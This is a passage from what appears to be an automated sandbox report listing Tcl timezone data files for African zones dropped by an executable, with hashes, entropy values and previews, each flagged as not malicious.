                                                                                                                                                                                                                              Entropy (8bit):4.8447607449193075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2Dc8bEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DJbVDR
                                                                                                                                                                                                                              MD5:7A819572758BC60F4085DF28F1DD1C01
                                                                                                                                                                                                                              SHA1:0A5BA34EBFBA5A8E8B896713BA527781FC90FF01
                                                                                                                                                                                                                              SHA-256:AB69948637416219A3D458777990FA4568BEBC89388884BBF129C0E1370A560B
                                                                                                                                                                                                                              SHA-512:C03E785D1E85292056BB0BDD8DF8326C5DFEB6070AB1C071E1032D14EA69C9DEBC57B2CC7852E35D31652187126CCF0009A6A5C32F9DBB75D56C705535DF05CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Dar_es_Salaam) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.829357904445218
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcRHKQ1BQDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DOrkDR
                                                                                                                                                                                                                              MD5:7981499F9430DC1636C9F834273E0B91
                                                                                                                                                                                                                              SHA1:1D63F8578420D56E4A5D9D0881FBEC015421E416
                                                                                                                                                                                                                              SHA-256:E7F7560CCD65D53C446ADAE7128A74D37E17DD0B907A2F2FD85322FB8707B497
                                                                                                                                                                                                                              SHA-512:3C3F7D78E9A0DE6E2950E1C305EA2DBC986754AE9FB10AC410685F30C39EC235F6F221393099C012E62EE5A7B4F1BED67C96B7B81E90BBA064BA9FE685FE4050
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.850101792457859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcnKe2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dml2D4yn
                                                                                                                                                                                                                              MD5:44881E75AC32FA95FF6143066EF01B90
                                                                                                                                                                                                                              SHA1:A221619B4CDE8BE6A181E1F3869EAB665F2E98B8
                                                                                                                                                                                                                              SHA-256:FCF2DAD148F4D2951320EA99730C56D5EB43D505F37416BE4BAD265CE2902706
                                                                                                                                                                                                                              SHA-512:4FA67A5F84758366189F0FC4A7FA6C820BA083E1C56EA95D25D21A367F25F76261B7EB5631DFFEB20E095CFD64E770338773F76BD50D4CF6AE29AD3EDFCEC408
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Douala) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5235
                                                                                                                                                                                                                              Entropy (8bit):3.541189246992611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+eCJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:+eqZSszBrlKcJC9k
                                                                                                                                                                                                                              MD5:956F5B51FA8BA2E954A0E59AAC8F3276
                                                                                                                                                                                                                              SHA1:AE35A8502E57EA6EE173E3B42509E4CAC73DA091
                                                                                                                                                                                                                              SHA-256:5FB102A95B3C004AAB8371840B1A04AC352F48FF9E9EAFDEAAF21960B0F3CAA6
                                                                                                                                                                                                                              SHA-512:19E7F2574E2B62DF68CC24737F6B94864B3D64B2472BC7D78E6AB5142A1DC1AB3B3700AB802129CB16AED4A4FED29E2B8A5593EE327ADF496255FE2FEF6A7023
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/El_Aaiun) {.. {-9223372036854775808 -3168 0 LMT}.. {-1136070432 -3600 0 -01}.. {198291600 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {1373162400 0 0 +00}.. {1376100000 3600 1 +00}.. {1382839200 0 0 +00}.. {1396144800 3600 1 +00}.. {1403920800 0 0 +00}.. {1406944800 3600 1 +00}.. {1414288800 0 0 +00}.. {1427594400 3600 1 +00}.. {1434247200 0 0 +00}.. {1437271200 3600 1 +00}.. {1445738400 0 0 +00}.. {1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.866631090752554
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcu5sp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dk4DBS
                                                                                                                                                                                                                              MD5:6C115220CF951FC2EE3C299F86935B6D
                                                                                                                                                                                                                              SHA1:A1CAB8C710BF20553AF45343118C1726CFE922B7
                                                                                                                                                                                                                              SHA-256:BC53A4D489F48F14C594C4B0E52079B34E043A5751BBC7DF254A560352243575
                                                                                                                                                                                                                              SHA-512:E87A4FD145B645DF034182CAD7F9D2BE5B2D9F3A17B6A9B6C84A0B3E846D92EC4C69DF2E85129B7A1AFBC0CCAAC8E3B1D47EB09F0900A82B908E9F6BF63B9736
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.899477454245453
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcHK0o/4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAV+4Dt
                                                                                                                                                                                                                              MD5:07222D8ED83CDC456B4D5D84C4BDE320
                                                                                                                                                                                                                              SHA1:2C657F461FA3F48D56C791AFE4AB7D2EAF45AF60
                                                                                                                                                                                                                              SHA-256:653AF88955C4418D973E2F8681A99552EB7BE95BCA64C736072F488462F7B373
                                                                                                                                                                                                                              SHA-512:3016D0636F401BD88BCD460F6A61782E7E8A2C32CE4ECB904C711DF414038A5818F0CA3D7FC671C5ABCE70647FC674A2EF9081C5289EBFD184B44885902E007A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.884642061266759
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc0B5h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2Dlfh4Dt
                                                                                                                                                                                                                              MD5:8666DABE8D196ACD94A9691C592FAF4E
                                                                                                                                                                                                                              SHA1:9F7EE009DCEAACA79C6EAA6FC73015D595467919
                                                                                                                                                                                                                              SHA-256:06B82C524585192E0E8FC69DCC1CF86183A8C5EF404645DC413FCF3F8C16B0AB
                                                                                                                                                                                                                              SHA-512:AAA32FD1B01BFECDD0D1C9C1DF1163374DAFE094C75720EA4095C34F7EAE7DCB594D1A7F6A2A90FB43FF01020F7AEB48E92496E0EE2D039AF23076CD369DD2A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Harare) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):309
                                                                                                                                                                                                                              Entropy (8bit):4.695542624694403
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DWbzDm2OHePoHvmmXsd//HF2d7d6VcF2d6KsYov:MB862DW7mdHePCvmmcZvF0cVcF/KsFv
                                                                                                                                                                                                                              MD5:F0E153FC9B978E30742ABC025CA45E02
                                                                                                                                                                                                                              SHA1:73D96F3188190DAC2453E6F18A1C683CECB9CDE3
                                                                                                                                                                                                                              SHA-256:5EEF6475E1312051037FCAE3354E32DC0910BE7A5116B71F8CCBE1CCA08D3F1C
                                                                                                                                                                                                                              SHA-512:E66F4B5FF18BAAD53AFB1ED36A0827115C793075A61F794F26F32BC9F6799DF816A1F817BEB0C0BC938F89E6F5BFBE1AB4F504F1AF518764103FB287746552C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Johannesburg) {.. {-9223372036854775808 6720 0 LMT}.. {-2458173120 5400 0 SAST}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {-829526400 10800 1 SAST}.. {-813805200 7200 0 SAST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1127
                                                                                                                                                                                                                              Entropy (8bit):4.027824722230131
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5mesdOkMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8M5:5YMV04MSHMzNxMbwM0JXMfCsMzaMq0QJ
                                                                                                                                                                                                                              MD5:32EC0589260D9D4BCC85FE91E6F04D00
                                                                                                                                                                                                                              SHA1:BAA269852C4AC6B89EA7941E7A75A007E0CF9EDF
                                                                                                                                                                                                                              SHA-256:F2646E15488ABF2E960759CEFE5705416E71DA71BB8407B26196244FD1A3394F
                                                                                                                                                                                                                              SHA-512:4F485453BE1D186ADBE0908852475C63C57BA498091C222EFFB9A5FEA2DB7F55E1BB2DBDBF6AC0F24CC67D47549FA3F5257655B5449B1BCF1FB5CDB27B03D501
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Juba) {.. {-9223372036854775808 7588 0 LMT}.. {-1230775588 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.837466713772859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcJEl2DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DIEl2V
                                                                                                                                                                                                                              MD5:E929ED1BC316C71AABE7E625BD562FB1
                                                                                                                                                                                                                              SHA1:C20C172518C02D93327F4BBBC5D410BFFEF5039D
                                                                                                                                                                                                                              SHA-256:8EA3028CE2B025F0C457DC8F7601279CA5AF565A88B9FE80208F9F1030F2B0D0
                                                                                                                                                                                                                              SHA-512:B2FBCF06EACCF18DE97AF1D6BC57D9638E0A36DBF17044FF97F6B9E5089CF9E13E1304F304495324C0ACC1128A7D2D494E7C1FDB95DB0855FCE54F7028096C50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1131
                                                                                                                                                                                                                              Entropy (8bit):4.0421745451318385
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5xe9dSXMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8MM:5hMV04MSHMzNxMbwM0JXMfCsMzaMq0Qc
                                                                                                                                                                                                                              MD5:2BD3850DDBE2F05BF6F24F3AEFF7516C
                                                                                                                                                                                                                              SHA1:22B0DBB54E071F30D51A8654CF103F99537F74CD
                                                                                                                                                                                                                              SHA-256:F475DB8A857A46B310B12C21D6A9BC6CA9FF2960DA429A9D57FA375F9439E13B
                                                                                                                                                                                                                              SHA-512:1CF82FC07348C697F26625673DA7E3D734358B3FBE69D8E2132CAC0D9F00C7E8CDC353676CD9BAC4CBB9E26CF6638CEAE41DF559E7445D9C453409D7115FFC6C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Khartoum) {.. {-9223372036854775808 7808 0 LMT}.. {-1230775808 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.910322325134086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcCJRx+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DRX+DEi
                                                                                                                                                                                                                              MD5:3017253E1C6ACCA8D470A014E4BB321D
                                                                                                                                                                                                                              SHA1:671B7AC04580B56E2C34F88D123E8296947DDD7E
                                                                                                                                                                                                                              SHA-256:73FEB807006897B4B485CB82394867444E890265EFE960EC66D6C0E325DA9372
                                                                                                                                                                                                                              SHA-512:2498C380D761A16C183D78BC1BB18B1D2A1BFCB9C703D86A3FC04CCCE43D88C8D4BC3C47CC31639B78A5FE9C8A7445E9DBB52062E2F3B737DA1E7D0FF70F140A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Kigali) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.866127364448228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcqQFeDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DdD4yn
                                                                                                                                                                                                                              MD5:41209A335A99803239A854575190C5ED
                                                                                                                                                                                                                              SHA1:E6EA627C25513B9DDE053F9A24D509AA317C30A1
                                                                                                                                                                                                                              SHA-256:611375C4901AD6C4844C2BB7D02FB17F34996F49E642546A6784D6F0B28530CC
                                                                                                                                                                                                                              SHA-512:DF2C0B131F35F54DF5EBF7F8459F98DBABEB6F081247BA95B5D7B41146E2A2EF9BC6B1D909DE57A1223D9C258AB197D9668ED2E111A365C86BABDAA7DF551FB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                                              Entropy (8bit):4.7936510664790815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D4JDm2OHWQvvoHvBsp9boFvoHzIX7uRe6vF9:MB862DymdHWQCvqpmVCzIq
                                                                                                                                                                                                                              MD5:EC08046589E85D999A597252FF5368B7
                                                                                                                                                                                                                              SHA1:126E3DE158E1E7AF4737D0AB5B51C0F92F416DC7
                                                                                                                                                                                                                              SHA-256:DCC9F52F539A67DFD7ABAFDE072ACDAE2B67754C559C8A5FE61979F5A286A066
                                                                                                                                                                                                                              SHA-512:84B9AB18BC343C8B8934F5FDD2E2EB413925B04D6F5394AA8337B7B55E6487FB071A83A69BD4D0FA40F7F31EBC57B9908729674542CEA3083D700FCD02D77633
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Lagos) {.. {-9223372036854775808 815 0 LMT}.. {-2035584815 0 0 GMT}.. {-1940889600 815 0 LMT}.. {-1767226415 1800 0 +0030}.. {-1588465800 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.865878143076229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcr7bp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dgfp4D4y
                                                                                                                                                                                                                              MD5:35D8A58EE21E603C6FC4FB896AE6B3D0
                                                                                                                                                                                                                              SHA1:F1D0A939D761F3F0954F045814CF5339A5597036
                                                                                                                                                                                                                              SHA-256:AB3E797548C7663CF9ABA7FE163635FF7CAB9E6CB61FA1644C0F7B4B5CCE8B99
                                                                                                                                                                                                                              SHA-512:97717961987F6B6832C24A7833150CDFE7E82BBEB32DFDB84D2500442AAD9263F8BD4E879591E913D56E9A1991C389EF730211853647A889F358AE3FA37C0185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Libreville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.862780607964543
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcih4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DNh4D4
                                                                                                                                                                                                                              MD5:EA21ABBF8B11953916A1C509B8A1B427
                                                                                                                                                                                                                              SHA1:35ADC230C57B001BE8A99A3D2E34B609A60A1162
                                                                                                                                                                                                                              SHA-256:EACA9124F17E5B11F27D11FA6141D19EB3AC23E155E155B73467BDAA3BC99AA7
                                                                                                                                                                                                                              SHA-512:A7972D4F1C5FB988CA04B39E2CDD580F51383BA9D7A66C478275C11A07B8D7A6EFF53A3E1929B0D89F10BCC39D22F285DB2601ED60DB4647C65465643F70C137
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Lome) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.856982839546061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DccLtBQDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DXQD4yn
                                                                                                                                                                                                                              MD5:40CD47F6DCF51EBEFEF42489F1716257
                                                                                                                                                                                                                              SHA1:DF245192A1899A72DE01A57F6969AC060E841734
                                                                                                                                                                                                                              SHA-256:4C2FD1E44DFAAF0C0DD2EB56B84B538F1E2D84B301AB2CFB8EE7759783501444
                                                                                                                                                                                                                              SHA-512:D39BEB0EEF344B1A44F7D6A806A1D5B956D7D402648EE0C67C4BA46493236840AF975D89A91B2D33B8AA7D6DC9A051E66718DCDBC1C83B0E964215C2E32ED923
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Luanda) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.940313336280723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcfpT0DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2D8pT0Dt
                                                                                                                                                                                                                              MD5:71A5DE1276902DB1542840318F9B1AF3
                                                                                                                                                                                                                              SHA1:AC3825BF343482E0E4D9D6FAA6FCA4D1A125433B
                                                                                                                                                                                                                              SHA-256:24384EEC359FD24D181AAEF3C017E3C345490A8D352B29D19B1B143A29A811C2
                                                                                                                                                                                                                              SHA-512:2984EB42A79B8B32BB93DFE71F1C4C0CABFDC9B0A199971347BB3473463FA07FDB5D20227D288BF8653B1BDE347E1297459BBB4C3C34AF7A5434FBF945683577
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.905174746463853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcOf+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkDEi
                                                                                                                                                                                                                              MD5:1D7FDB388535CC59742CA0F1AEE27FBD
                                                                                                                                                                                                                              SHA1:A99FF2CAC47FD333429C22B271E190D979EEC024
                                                                                                                                                                                                                              SHA-256:B00801A7279741434D9C2D7EC7322DD93B85EA4F5C9976AB3A43F0AB142E1553
